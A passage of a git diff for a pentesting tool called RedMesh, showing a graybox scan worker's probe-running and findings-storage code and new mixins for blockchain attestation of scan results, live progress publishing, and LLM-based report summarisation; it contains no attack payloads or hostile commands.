) + self._store_findings("_graybox_weak_auth", weak_findings) + self.metrics.record_probe("_graybox_weak_auth", "completed") + except Exception as exc: + self._record_probe_error("_graybox_weak_auth", exc) + self.metrics.record_probe("_graybox_weak_auth", "failed") + self.state["completed_tests"].append("graybox_weak_auth") + self.metrics.phase_end("weak_auth") + elif self._credentials.weak_candidates and "_graybox_weak_auth" in (self.job_config.excluded_features or []): + self.metrics.record_probe("_graybox_weak_auth", "skipped:disabled") + + def _run_registered_probe(self, entry, probe_context: GrayboxProbeContext): + """Run one registered probe through a shared capability and error boundary.""" + probe_def = GrayboxProbeDefinition.from_entry(entry) + store_key = probe_def.key + probe_cls = self._import_probe(probe_def.cls_path) + + if probe_cls.is_stateful and not probe_context.allow_stateful: + self.metrics.record_probe(store_key, "skipped:stateful_disabled") + self._store_findings(store_key, [GrayboxFinding( + scenario_id=f"SKIP-{store_key}", + title="Probe skipped: stateful probes disabled", + status="inconclusive", severity="INFO", owasp="", + evidence=["stateful_probes_disabled=True"], + )]) + return + if probe_cls.requires_regular_session and not self.auth.regular_session: + self.metrics.record_probe(store_key, "skipped:missing_regular_session") + return + if probe_cls.requires_auth and not self.auth.official_session: + self.metrics.record_probe(store_key, "skipped:missing_auth") + return + + require_regular = bool(probe_cls.requires_regular_session) + if not self._ensure_active_sessions(store_key, require_regular=require_regular): + self.metrics.record_probe(store_key, "failed:auth_refresh") + return + + try: + from_context = getattr(probe_cls, "from_context", None) + has_explicit_from_context = "from_context" in getattr(probe_cls, "__dict__", {}) + if has_explicit_from_context and callable(from_context): + probe = from_context(probe_context) + else: + 
probe = probe_cls(**probe_context.to_kwargs()) + run_result = self._normalize_probe_run_result(probe.run()) + self._store_findings(store_key, run_result) + self.metrics.record_probe(store_key, run_result.outcome) + except Exception as exc: + self._record_probe_error(store_key, exc) + self.metrics.record_probe(store_key, "failed") + + def _ensure_active_sessions(self, scope, require_regular=False): + """Fail closed if session refresh cannot restore required auth state.""" + auth_ok = self.auth.ensure_sessions( + self._credentials.official, + self._credentials.regular if require_regular or self._credentials.regular else None, + ) + if auth_ok: + return True + + sanitized_scope = scope.replace("_", " ") + self._record_fatal( + f"Authentication session refresh failed during {sanitized_scope}. " + "Graybox scan cannot continue safely." + ) + return False + + @staticmethod + def _normalize_probe_run_result(value) -> GrayboxProbeRunResult: + return GrayboxProbeRunResult.from_value(value) + + def _store_findings(self, key, findings): + """Store GrayboxFinding dicts in graybox_results under the port key.""" + run_result = self._normalize_probe_run_result(findings) + port_results = self.state["graybox_results"].setdefault(self._port_key, {}) + port_results[key] = { + "findings": [f.to_dict() for f in run_result.findings], + "artifacts": [ + GrayboxEvidenceArtifact.from_value(artifact).to_dict() + for artifact in run_result.artifacts + ], + "outcome": run_result.outcome, + } + for finding in run_result.findings: + self.metrics.record_finding(getattr(finding, "severity", "INFO")) + + def _store_auth_results(self): + port_info = self.state["service_info"].setdefault(self._port_key, {}) + port_info["_graybox_auth"] = { + "official_success": self.auth.official_session is not None, + "regular_success": self.auth.regular_session is not None, + "auth_errors": list(self.auth._auth_errors), + "findings": [], + } + + def _store_discovery_results(self, routes, forms): + port_info = 
self.state["service_info"].setdefault(self._port_key, {}) + port_info["_graybox_discovery"] = { + "routes": routes, + "forms": forms, + "findings": [], + } + + def _record_fatal(self, message): + """Record unrecoverable error as a GrayboxFinding.""" + self._store_findings("_graybox_fatal", [GrayboxFinding( + scenario_id="FATAL", + title="Scan aborted", + status="inconclusive", + severity="INFO", + owasp="", + evidence=[f"error={message}"], + error=message, + )]) + + def _record_probe_error(self, store_key, exc): + """Record per-probe error without killing the scan.""" + sanitized = self.safety.sanitize_error(str(exc)) + self._store_findings(store_key, [GrayboxFinding( + scenario_id=f"ERR-{store_key}", + title=f"Probe error: {store_key}", + status="inconclusive", + severity="INFO", + owasp="", + evidence=[f"error={sanitized}"], + error=sanitized, + )]) + + @staticmethod + def _import_probe(cls_path): + """Dynamically import a probe class from the registry.""" + module_name, class_name = cls_path.rsplit(".", 1) + full_module = f"..probes.{module_name}" + mod = importlib.import_module(full_module, package=__name__) + return getattr(mod, class_name) + + def _set_phase(self, phase): + self._phase = phase + + def _compute_scenario_stats(self): + """Compute scenario stats from graybox_results.""" + stats = { + "total": 0, "vulnerable": 0, "not_vulnerable": 0, + "inconclusive": 0, "error": 0, + } + for port_key, probes in self.state["graybox_results"].items(): + for probe_key, probe_data in probes.items(): + for finding in probe_data.get("findings", []): + status = finding.get("status", "") + if not status: + continue + stats["total"] += 1 + if status in stats: + stats[status] += 1 + else: + stats["error"] += 1 + return stats + + @staticmethod + def get_worker_specific_result_fields(): + """Register graybox_results for aggregation.""" + return { + "graybox_results": dict, + "service_info": dict, + "web_tests_info": dict, + "open_ports": list, + "completed_tests": list, + 
"port_protocols": dict, + "correlation_findings": list, + "scan_metrics": dict, + "ports_scanned": list, + } diff --git a/extensions/business/cybersec/red_mesh/mixins/__init__.py b/extensions/business/cybersec/red_mesh/mixins/__init__.py new file mode 100644 index 00000000..ec68a976 --- /dev/null +++ b/extensions/business/cybersec/red_mesh/mixins/__init__.py @@ -0,0 +1,13 @@ +from .attestation import _AttestationMixin +from .risk import _RiskScoringMixin +from .report import _ReportMixin +from .live_progress import _LiveProgressMixin +from .llm_agent import _RedMeshLlmAgentMixin + +__all__ = [ + "_AttestationMixin", + "_RiskScoringMixin", + "_ReportMixin", + "_LiveProgressMixin", + "_RedMeshLlmAgentMixin", +] diff --git a/extensions/business/cybersec/red_mesh/mixins/attestation.py b/extensions/business/cybersec/red_mesh/mixins/attestation.py new file mode 100644 index 00000000..21e1de8a --- /dev/null +++ b/extensions/business/cybersec/red_mesh/mixins/attestation.py @@ -0,0 +1,299 @@ +""" +Blockchain attestation mixin for RedMesh pentester API. + +Handles obfuscation of scan metadata (IPs, CIDs, execution IDs) and +submission of attestations to the Ratio1 blockchain via the bc client. 
+""" + +import ipaddress +from urllib.parse import urlparse + +from ..constants import RUN_MODE_SINGLEPASS, RUN_MODE_CONTINUOUS_MONITORING +from ..services.config import get_attestation_config +from ..services.resilience import run_bounded_retry + + +class _AttestationMixin: + """Blockchain attestation methods for PentesterApi01Plugin.""" + + @staticmethod + def _resolve_attestation_report_cid(workers: dict, preferred_cid=None) -> str | None: + if isinstance(preferred_cid, str) and preferred_cid.strip(): + return preferred_cid.strip() + if not isinstance(workers, dict): + return None + + report_cids = [ + worker.get("report_cid", "").strip() + for worker in workers.values() + if isinstance(worker, dict) and isinstance(worker.get("report_cid"), str) and worker.get("report_cid").strip() + ] + if len(report_cids) == 1: + return report_cids[0] + return None + + def _attestation_get_tenant_private_key(self): + private_key = get_attestation_config(self)["PRIVATE_KEY"] + if private_key: + private_key = private_key.strip() + if not private_key: + return None + return private_key + + @staticmethod + def _attestation_pack_cid_obfuscated(report_cid) -> str: + if not isinstance(report_cid, str) or len(report_cid.strip()) == 0: + return "0x" + ("00" * 10) + cid = report_cid.strip() + if len(cid) >= 10: + masked = cid[:5] + cid[-5:] + else: + masked = cid.ljust(10, "_") + safe = "".join(ch if 32 <= ord(ch) <= 126 else "_" for ch in masked)[:10] + data = safe.encode("ascii", errors="ignore") + if len(data) < 10: + data = data + (b"_" * (10 - len(data))) + return "0x" + data[:10].hex() + + @staticmethod + def _attestation_extract_host(target): + if not isinstance(target, str): + return None + target = target.strip() + if not target: + return None + if "://" in target: + parsed = urlparse(target) + if parsed.hostname: + return parsed.hostname + host = target.split("/", 1)[0] + if host.count(":") == 1 and "." 
in host: + host = host.split(":", 1)[0] + return host + + def _attestation_pack_ip_obfuscated(self, target) -> str: + host = self._attestation_extract_host(target) + if not host: + return "0x0000" + if ".." in host: + parts = host.split("..") + if len(parts) == 2 and all(part.isdigit() for part in parts): + first_octet = int(parts[0]) + last_octet = int(parts[1]) + if 0 <= first_octet <= 255 and 0 <= last_octet <= 255: + return f"0x{first_octet:02x}{last_octet:02x}" + try: + ip_obj = ipaddress.ip_address(host) + except Exception: + return "0x0000" + if ip_obj.version != 4: + return "0x0000" + octets = host.split(".") + first_octet = int(octets[0]) + last_octet = int(octets[-1]) + return f"0x{first_octet:02x}{last_octet:02x}" + + @staticmethod + def _attestation_pack_execution_id(job_id) -> str: + if not isinstance(job_id, str): + raise ValueError("job_id must be a string") + job_id = job_id.strip() + if len(job_id) != 8: + raise ValueError("job_id must be exactly 8 characters") + try: + data = job_id.encode("ascii") + except UnicodeEncodeError as exc: + raise ValueError("job_id must contain only ASCII characters") from exc + return "0x" + data.hex() + + def _attestation_get_worker_eth_addresses(self, workers: dict) -> list[str]: + if not isinstance(workers, dict): + return [] + eth_addresses = [] + for node_addr in workers.keys(): + eth_addr = self.bc.node_addr_to_eth_addr(node_addr) + if not isinstance(eth_addr, str) or not eth_addr.startswith("0x"): + raise ValueError(f"Unable to convert worker node to EVM address: {node_addr}") + eth_addresses.append(eth_addr) + eth_addresses.sort() + return eth_addresses + + def _attestation_pack_node_hashes(self, workers: dict) -> str: + eth_addresses = self._attestation_get_worker_eth_addresses(workers) + if len(eth_addresses) == 0: + return "0x" + ("00" * 32) + digest = self.bc.eth_hash_message(types=["address[]"], values=[eth_addresses], as_hex=True) + if isinstance(digest, str) and digest.startswith("0x"): + return digest 
+ return "0x" + str(digest) + + def _submit_redmesh_test_attestation( + self, + job_id: str, + job_specs: dict, + workers: dict, + vulnerability_score=0, + node_ips=None, + report_cid=None, + ): + self.P(f"[ATTESTATION] Test attestation requested for job {job_id} (score={vulnerability_score})") + attestation_cfg = get_attestation_config(self) + if not attestation_cfg["ENABLED"]: + self.P("[ATTESTATION] Attestation is disabled via config. Skipping.", color='y') + return None + tenant_private_key = self._attestation_get_tenant_private_key() + if tenant_private_key is None: + self.P( + "[ATTESTATION] Tenant private key is missing. " + "Expected env var 'R1EN_ATTESTATION_PRIVATE_KEY'. Skipping.", + color='y' + ) + return None + + run_mode = str(job_specs.get("run_mode", RUN_MODE_SINGLEPASS)).upper() + test_mode = 1 if run_mode == RUN_MODE_CONTINUOUS_MONITORING else 0 + node_count = len(workers) if isinstance(workers, dict) else 0 + target = job_specs.get("target") + execution_id = self._attestation_pack_execution_id(job_id) + report_cid = self._resolve_attestation_report_cid(workers, preferred_cid=report_cid) + node_eth_address = self.bc.eth_address + ip_obfuscated = self._attestation_pack_ip_obfuscated(target) + cid_obfuscated = self._attestation_pack_cid_obfuscated(report_cid) + + self.P( + f"[ATTESTATION] Submitting test attestation: job={job_id}, mode={'CONTINUOUS' if test_mode else 'SINGLEPASS'}, " + f"nodes={node_count}, score={vulnerability_score}, target={ip_obfuscated}, " + f"cid={cid_obfuscated}, sender={node_eth_address}" + ) + retries = max(int(attestation_cfg["RETRIES"] or 1), 1) + tx_hash = run_bounded_retry( + self, + "submit_redmesh_test_attestation", + retries, + lambda: self.bc.submit_attestation( + function_name="submitRedmeshTestAttestation", + function_args=[ + test_mode, + node_count, + vulnerability_score, + execution_id, + ip_obfuscated, + cid_obfuscated, + ], + signature_types=["bytes32", "uint8", "uint16", "uint8", "bytes8", "bytes2", 
"bytes10"], + signature_values=[ + self.REDMESH_ATTESTATION_DOMAIN, + test_mode, + node_count, + vulnerability_score, + execution_id, + ip_obfuscated, + cid_obfuscated, + ], + tx_private_key=tenant_private_key, + ), + ) + if not tx_hash: + self.P(f"[ATTESTATION] Test attestation failed after {retries} attempts.", color='y') + return None + + # Obfuscate node IPs for attestation metadata + obfuscated_node_ips = [] + if node_ips: + for ip in node_ips: + obfuscated_node_ips.append(self._attestation_pack_ip_obfuscated(ip)) + + result = { + "job_id": job_id, + "tx_hash": tx_hash, + "test_mode": "C" if test_mode == 1 else "S", + "node_count": node_count, + "vulnerability_score": vulnerability_score, + "execution_id": execution_id, + "report_cid": report_cid, + "node_eth_address": node_eth_address, + "node_ips_obfuscated": obfuscated_node_ips, + } + self.P( + "Submitted RedMesh test attestation for " + f"{job_id} (tx: {tx_hash}, node: {node_eth_address}, score: {vulnerability_score})", + color='g' + ) + return result + + def _submit_redmesh_job_start_attestation(self, job_id: str, job_specs: dict, workers: dict): + self.P(f"[ATTESTATION] Job-start attestation requested for job {job_id}") + attestation_cfg = get_attestation_config(self) + if not attestation_cfg["ENABLED"]: + self.P("[ATTESTATION] Attestation is disabled via config. Skipping.", color='y') + return None + tenant_private_key = self._attestation_get_tenant_private_key() + if tenant_private_key is None: + self.P( + "[ATTESTATION] Tenant private key is missing. " + "Expected env var 'R1EN_ATTESTATION_PRIVATE_KEY'. 
Skipping.", + color='y' + ) + return None + + run_mode = str(job_specs.get("run_mode", RUN_MODE_SINGLEPASS)).upper() + test_mode = 1 if run_mode == RUN_MODE_CONTINUOUS_MONITORING else 0 + node_count = len(workers) if isinstance(workers, dict) else 0 + target = job_specs.get("target") + execution_id = self._attestation_pack_execution_id(job_id) + node_eth_address = self.bc.eth_address + ip_obfuscated = self._attestation_pack_ip_obfuscated(target) + node_hashes = self._attestation_pack_node_hashes(workers) + + worker_addrs = list(workers.keys()) if isinstance(workers, dict) else [] + self.P( + f"[ATTESTATION] Submitting job-start attestation: job={job_id}, mode={'CONTINUOUS' if test_mode else 'SINGLEPASS'}, " + f"nodes={node_count}, target={ip_obfuscated}, node_hashes={node_hashes}, " + f"workers={worker_addrs}, sender={node_eth_address}" + ) + retries = max(int(attestation_cfg["RETRIES"] or 1), 1) + tx_hash = run_bounded_retry( + self, + "submit_redmesh_job_start_attestation", + retries, + lambda: self.bc.submit_attestation( + function_name="submitRedmeshJobStartAttestation", + function_args=[ + test_mode, + node_count, + execution_id, + node_hashes, + ip_obfuscated, + ], + signature_types=["bytes32", "uint8", "uint16", "bytes8", "bytes32", "bytes2"], + signature_values=[ + self.REDMESH_ATTESTATION_DOMAIN, + test_mode, + node_count, + execution_id, + node_hashes, + ip_obfuscated, + ], + tx_private_key=tenant_private_key, + ), + ) + if not tx_hash: + self.P(f"[ATTESTATION] Job-start attestation failed after {retries} attempts.", color='y') + return None + + result = { + "job_id": job_id, + "tx_hash": tx_hash, + "test_mode": "C" if test_mode == 1 else "S", + "node_count": node_count, + "execution_id": execution_id, + "node_hashes": node_hashes, + "ip_obfuscated": ip_obfuscated, + "node_eth_address": node_eth_address, + } + self.P( + "Submitted RedMesh job-start attestation for " + f"{job_id} (tx: {tx_hash}, node: {node_eth_address}, node_count: {node_count})", + 
color='g' + ) + return result diff --git a/extensions/business/cybersec/red_mesh/mixins/live_progress.py b/extensions/business/cybersec/red_mesh/mixins/live_progress.py new file mode 100644 index 00000000..cdd0884c --- /dev/null +++ b/extensions/business/cybersec/red_mesh/mixins/live_progress.py @@ -0,0 +1,339 @@ +""" +Live progress mixin for RedMesh pentester API. + +Handles real-time scan progress publishing to the CStore `:live` hset +and merging of scan metrics across worker threads. +""" + +from ..models import WorkerProgress +from ..constants import PHASE_ORDER, GRAYBOX_PHASE_ORDER + +DEFAULT_PROGRESS_PUBLISH_INTERVAL = 30.0 + + +def _thread_phase(state): + """Determine which phase a single thread is currently in. + + Supports both network and webapp (graybox) scan types. Network + scans use the existing phase markers. Webapp scans use graybox_* + markers and map to their own phase names. + """ + tests = set(state.get("completed_tests", [])) + scan_type = state.get("scan_type") + + if scan_type == "webapp": + # Graybox phase progression: + # preflight -> authentication -> discovery -> graybox_probes -> weak_auth -> done + if "graybox_weak_auth" in tests or "graybox_probes" in tests: + return "done" + if "graybox_discovery" in tests: + return "graybox_probes" + if "graybox_auth" in tests: + return "discovery" + return "preflight" + + # Network phase progression (unchanged): + if "correlation_completed" in tests: + return "done" + if "web_tests_completed" in tests: + return "correlation" + if "service_info_completed" in tests: + return "web_tests" + if "fingerprint_completed" in tests: + return "service_probes" + return "port_scan" + + +class _LiveProgressMixin: + """Live progress tracking methods for PentesterApi01Plugin.""" + + def _get_execution_live_meta(self, job_id): + """Return cached worker-owned live metadata for an active local execution.""" + meta_map = getattr(self, "_execution_live_meta", None) + if isinstance(meta_map, dict): + meta = 
meta_map.get(job_id)
            if isinstance(meta, dict):
                # Return a shallow copy so callers cannot mutate the cache.
                return dict(meta)
        return {}

    def _get_progress_publish_interval(self):
        """Return a safe numeric live-progress publish interval in seconds.

        Resolution order: instance override, plugin cfg attribute, CONFIG
        dict entry; anything non-numeric or <= 0 falls back to
        DEFAULT_PROGRESS_PUBLISH_INTERVAL.
        """
        interval = getattr(self, "_progress_publish_interval", None)
        if interval is None:
            interval = getattr(self, "cfg_progress_publish_interval", None)
        if interval is None:
            config = getattr(self, "CONFIG", None)
            if isinstance(config, dict):
                interval = config.get("PROGRESS_PUBLISH_INTERVAL")
        try:
            interval = float(interval)
        except (TypeError, ValueError):
            interval = DEFAULT_PROGRESS_PUBLISH_INTERVAL
        if interval <= 0:
            interval = DEFAULT_PROGRESS_PUBLISH_INTERVAL
        return interval

    @staticmethod
    def _merge_worker_metrics(metrics_list):
        """Merge scan_metrics dicts from multiple local worker threads."""
        if not metrics_list:
            return None
        merged = {}
        # Sum connection outcomes
        outcomes = {}
        for m in metrics_list:
            for k, v in (m.get("connection_outcomes") or {}).items():
                outcomes[k] = outcomes.get(k, 0) + v
        if outcomes:
            merged["connection_outcomes"] = outcomes
        # Sum coverage
        cov_scanned = sum(m.get("coverage", {}).get("ports_scanned", 0) for m in metrics_list if m.get("coverage"))
        cov_range = sum(m.get("coverage", {}).get("ports_in_range", 0) for m in metrics_list if m.get("coverage"))
        cov_skipped = sum(m.get("coverage", {}).get("ports_skipped", 0) for m in metrics_list if m.get("coverage"))
        cov_open = sum(m.get("coverage", {}).get("open_ports_count", 0) for m in metrics_list if m.get("coverage"))
        if cov_range:
            merged["coverage"] = {
                "ports_in_range": cov_range, "ports_scanned": cov_scanned,
                "ports_skipped": cov_skipped,
                "coverage_pct": round(cov_scanned / cov_range * 100, 1),
                "open_ports_count": cov_open,
            }
        # Sum finding distribution
        findings = {}
        for m in metrics_list:
            for k, v in (m.get("finding_distribution") or {}).items():
                findings[k] = findings.get(k, 0) + v
        if findings:
merged["finding_distribution"] = findings + # Sum service distribution + services = {} + for m in metrics_list: + for k, v in (m.get("service_distribution") or {}).items(): + services[k] = services.get(k, 0) + v + if services: + merged["service_distribution"] = services + # Sum probe counts + for field in ("probes_attempted", "probes_completed", "probes_skipped", "probes_failed"): + merged[field] = sum(m.get(field, 0) for m in metrics_list) + # Sum graybox scenario counters + for field in ( + "scenarios_total", + "scenarios_vulnerable", + "scenarios_clean", + "scenarios_inconclusive", + "scenarios_error", + ): + merged[field] = sum(m.get(field, 0) for m in metrics_list) + # Merge probe breakdown (union of all probes) + probe_bd = {} + for m in metrics_list: + for k, v in (m.get("probe_breakdown") or {}).items(): + # Keep worst status: failed > skipped > completed + existing = probe_bd.get(k) + if existing is None or v == "failed" or (v.startswith("skipped") and existing == "completed"): + probe_bd[k] = v + if probe_bd: + merged["probe_breakdown"] = probe_bd + # Total duration: max across threads/nodes (they run in parallel) + merged["total_duration"] = max(m.get("total_duration", 0) for m in metrics_list) + # Phase durations: max per phase (threads/nodes run in parallel, so wall-clock + # time for each phase is the max across all of them) + all_phases = {} + for m in metrics_list: + for phase, dur in (m.get("phase_durations") or {}).items(): + all_phases[phase] = max(all_phases.get(phase, 0), dur) + if all_phases: + merged["phase_durations"] = all_phases + longest = max(metrics_list, key=lambda m: m.get("total_duration", 0)) + # Merge stats distributions (response_times, port_scan_delays) + # Use weighted mean, global min/max, approximate p95/p99 from max of per-thread values + for stats_field in ("response_times", "port_scan_delays"): + stats_list = [m[stats_field] for m in metrics_list if m.get(stats_field)] + if stats_list: + total_count = sum(s.get("count", 0) 
for s in stats_list) + if total_count > 0: + merged[stats_field] = { + "min": min(s["min"] for s in stats_list), + "max": max(s["max"] for s in stats_list), + "mean": round(sum(s["mean"] * s.get("count", 1) for s in stats_list) / total_count, 4), + "median": round(sum(s["median"] * s.get("count", 1) for s in stats_list) / total_count, 4), + "stddev": round(max(s.get("stddev", 0) for s in stats_list), 4), + "p95": round(max(s.get("p95", 0) for s in stats_list), 4), + "p99": round(max(s.get("p99", 0) for s in stats_list), 4), + "count": total_count, + } + # Success rate over time: take from the longest-running thread + if longest.get("success_rate_over_time"): + merged["success_rate_over_time"] = longest["success_rate_over_time"] + # Detection flags (any thread detecting = True) + merged["rate_limiting_detected"] = any(m.get("rate_limiting_detected") for m in metrics_list) + merged["blocking_detected"] = any(m.get("blocking_detected") for m in metrics_list) + # Open port details: union, deduplicate by port + all_details = [] + seen_ports = set() + for m in metrics_list: + for d in (m.get("open_port_details") or []): + if d["port"] not in seen_ports: + seen_ports.add(d["port"]) + all_details.append(d) + if all_details: + merged["open_port_details"] = sorted(all_details, key=lambda x: x["port"]) + # Banner confirmation: sum counts + bc_confirmed = sum(m.get("banner_confirmation", {}).get("confirmed", 0) for m in metrics_list) + bc_guessed = sum(m.get("banner_confirmation", {}).get("guessed", 0) for m in metrics_list) + if bc_confirmed + bc_guessed > 0: + merged["banner_confirmation"] = {"confirmed": bc_confirmed, "guessed": bc_guessed} + return merged + + def _publish_live_progress(self): + """ + Publish live progress for all active local scan jobs. + + Builds per-thread progress data and writes a single WorkerProgress entry + per job to the `:live` CStore hset. Called periodically from process(). 
+ + Progress is stage-based (stage_idx / 5 * 100) with port-scan sub-progress. + Phase is the earliest (least advanced) phase across all threads. + Per-thread data (phase, ports) is included when multiple threads are active. + """ + now = self.time() + publish_interval = _LiveProgressMixin._get_progress_publish_interval(self) + if now - self._last_progress_publish < publish_interval: + return + self._last_progress_publish = now + + live_hkey = f"{self.cfg_instance_id}:live" + ee_addr = self.ee_addr + + for job_id, local_workers in self.scan_jobs.items(): + if not local_workers: + continue + + # Determine phase order based on scan type (inspect first worker) + first_worker = next(iter(local_workers.values())) + if first_worker.state.get("scan_type") == "webapp": + scan_type = "webapp" + phase_order = GRAYBOX_PHASE_ORDER + else: + scan_type = "network" + phase_order = PHASE_ORDER + nr_phases = len(phase_order) + + # Build per-thread data + total_scanned = 0 + total_ports = 0 + all_open = set() + all_tests = set() + thread_entries = {} + thread_phases = [] + worker_metrics = [] + + for tid, worker in local_workers.items(): + state = worker.state + nr_ports = len(worker.initial_ports) + t_scanned = len(state.get("ports_scanned", [])) + t_open = sorted(state.get("open_ports", [])) + t_phase = _thread_phase(state) + + total_scanned += t_scanned + total_ports += nr_ports + all_open.update(t_open) + all_tests.update(state.get("completed_tests", [])) + worker_metrics.append(worker.metrics.build().to_dict()) + thread_phases.append(t_phase) + + thread_entries[tid] = { + "phase": t_phase, + "ports_scanned": t_scanned, + "ports_total": nr_ports, + "open_ports_found": t_open, + } + + # Overall phase: earliest (least advanced) across threads + phase_indices = [phase_order.index(p) if p in phase_order else nr_phases for p in thread_phases] + min_phase_idx = min(phase_indices) if phase_indices else 0 + phase = phase_order[min_phase_idx] if min_phase_idx < nr_phases else "done" + 
phase_index = nr_phases if phase == "done" else (min_phase_idx + 1 if phase in phase_order else 0) + + # Stage-based progress: completed_stages / total * 100 + # During port_scan, add sub-progress based on ports scanned + stage_progress = (min_phase_idx / nr_phases) * 100 + if phase == "port_scan" and total_ports > 0: + stage_progress += (total_scanned / total_ports) * (100 / nr_phases) + progress_pct = round(min(stage_progress, 100), 1) + + # Look up pass number from CStore + job_specs = self.chainstore_hget(hkey=self.cfg_instance_id, key=job_id) + pass_nr = 1 + assignment_revision = 1 + if isinstance(job_specs, dict): + pass_nr = job_specs.get("job_pass", 1) + worker_entry = (job_specs.get("workers") or {}).get(ee_addr) or {} + try: + assignment_revision = int(worker_entry.get("assignment_revision", 1) or 1) + except (TypeError, ValueError): + assignment_revision = 1 + + live_meta = _LiveProgressMixin._get_execution_live_meta(self, job_id) + started_at = live_meta.get("started_at", now) + first_seen_live_at = live_meta.get("first_seen_live_at", started_at) + last_seen_at = now + assignment_revision_seen = live_meta.get("assignment_revision_seen", assignment_revision) + + # Merge metrics from all local threads + merged_metrics = worker_metrics[0] if len(worker_metrics) == 1 else self._merge_worker_metrics(worker_metrics) + + progress = WorkerProgress( + job_id=job_id, + worker_addr=ee_addr, + pass_nr=pass_nr, + assignment_revision_seen=assignment_revision_seen, + progress=progress_pct, + phase=phase, + scan_type=scan_type, + phase_index=phase_index, + total_phases=nr_phases, + ports_scanned=total_scanned, + ports_total=total_ports, + open_ports_found=sorted(all_open), + completed_tests=sorted(all_tests), + updated_at=now, + started_at=started_at, + first_seen_live_at=first_seen_live_at, + last_seen_at=last_seen_at, + finished=False, + live_metrics=merged_metrics, + threads=thread_entries if len(thread_entries) > 1 else None, + ) + self.chainstore_hset( + 
hkey=live_hkey, + key=f"{job_id}:{ee_addr}", + value=progress.to_dict(), + ) + self.P( + "[LIVE->CSTORE] Published worker progress " + f"job_id={job_id} worker={ee_addr} pass={pass_nr} " + f"rev={assignment_revision_seen} " + f"phase={phase} progress={progress_pct}% " + f"ports={total_scanned}/{total_ports} open={len(all_open)} " + f"key={job_id}:{ee_addr}" + ) + + def _clear_live_progress(self, job_id, worker_addresses): + """ + Remove live progress keys for a completed job. + + Parameters + ---------- + job_id : str + Job identifier. + worker_addresses : list[str] + Worker addresses whose progress keys should be removed. + """ + live_hkey = f"{self.cfg_instance_id}:live" + for addr in worker_addresses: + self.chainstore_hset( + hkey=live_hkey, + key=f"{job_id}:{addr}", + value=None, # delete + ) diff --git a/extensions/business/cybersec/red_mesh/mixins/llm_agent.py b/extensions/business/cybersec/red_mesh/mixins/llm_agent.py new file mode 100644 index 00000000..94fcde3f --- /dev/null +++ b/extensions/business/cybersec/red_mesh/mixins/llm_agent.py @@ -0,0 +1,985 @@ +""" +LLM Agent API Mixin for RedMesh Pentester. + +This mixin provides LLM integration methods for analyzing scan results +via the RedMesh LLM Agent API (DeepSeek). + +Usage: + class PentesterApi01Plugin(_LlmAgentMixin, BasePlugin): + ... 
+""" + +import requests +import json +from typing import Optional + +from ..constants import RUN_MODE_SINGLEPASS +from ..services.config import get_llm_agent_config +from ..services.resilience import run_bounded_retry + +_NON_RETRYABLE_HTTP_STATUSES = {400, 401, 403, 404, 409, 410, 413, 422} +_NON_RETRYABLE_PROVIDER_STATUSES = _NON_RETRYABLE_HTTP_STATUSES +_LLM_EVIDENCE_MAX_CHARS = 240 +_LLM_BANNER_MAX_CHARS = 120 +_LLM_PAYLOAD_LIMITS = { + "security_assessment": {"services": 25, "findings": 40, "evidence_chars": 220, "open_ports": 40}, + "quick_summary": {"services": 12, "findings": 12, "evidence_chars": 140, "open_ports": 20}, + "vulnerability_summary": {"services": 20, "findings": 30, "evidence_chars": 180, "open_ports": 30}, + "remediation_plan": {"services": 18, "findings": 24, "evidence_chars": 180, "open_ports": 30}, +} +_LLM_FINDING_BUCKETS = { + "security_assessment": {"CRITICAL": 16, "HIGH": 14, "MEDIUM": 8, "LOW": 2, "INFO": 0, "UNKNOWN": 0}, + "quick_summary": {"CRITICAL": 6, "HIGH": 4, "MEDIUM": 2, "LOW": 0, "INFO": 0, "UNKNOWN": 0}, + "vulnerability_summary": {"CRITICAL": 12, "HIGH": 10, "MEDIUM": 6, "LOW": 2, "INFO": 0, "UNKNOWN": 0}, + "remediation_plan": {"CRITICAL": 10, "HIGH": 8, "MEDIUM": 4, "LOW": 2, "INFO": 0, "UNKNOWN": 0}, +} +_LLM_SEVERITY_ORDER = {"CRITICAL": 0, "HIGH": 1, "MEDIUM": 2, "LOW": 3, "INFO": 4, "UNKNOWN": 5} + + +class _RedMeshLlmAgentMixin(object): + """ + Mixin providing LLM Agent API integration for RedMesh plugins. 
+ + This mixin expects the host class to have the following config attributes: + - cfg_llm_agent: dict-like nested config block, or equivalent config_data/CONFIG block + - cfg_llm_agent_api_host: str + - cfg_llm_agent_api_port: int + + And the following methods/attributes: + - self.r1fs: R1FS instance + - self.P(): logging method + - self.Pd(): debug logging method + - self._get_aggregated_report(): report aggregation method + """ + + def __init__(self, **kwargs): + super(_RedMeshLlmAgentMixin, self).__init__(**kwargs) + return + + def _get_llm_agent_config(self) -> dict: + return get_llm_agent_config(self) + + @staticmethod + def _llm_trim_text(value, max_chars): + if value is None: + return "" + text = str(value).strip() + if len(text) <= max_chars: + return text + return text[: max_chars - 3].rstrip() + "..." + + def _extract_report_findings(self, report: dict) -> list[dict]: + findings = [] + if not isinstance(report, dict): + return findings + + direct = report.get("findings") + if isinstance(direct, list): + findings.extend(item for item in direct if isinstance(item, dict)) + + correlation = report.get("correlation_findings") + if isinstance(correlation, list): + findings.extend(item for item in correlation if isinstance(item, dict)) + + service_info = report.get("service_info") + if isinstance(service_info, dict): + for service_entry in service_info.values(): + if not isinstance(service_entry, dict): + continue + nested = service_entry.get("findings") + if isinstance(nested, list): + findings.extend(item for item in nested if isinstance(item, dict)) + + web_tests = report.get("web_tests_info") + if isinstance(web_tests, dict): + for web_entry in web_tests.values(): + if not isinstance(web_entry, dict): + continue + nested = web_entry.get("findings") + if isinstance(nested, list): + findings.extend(item for item in nested if isinstance(item, dict)) + for method_entry in web_entry.values(): + if not isinstance(method_entry, dict): + continue + nested = 
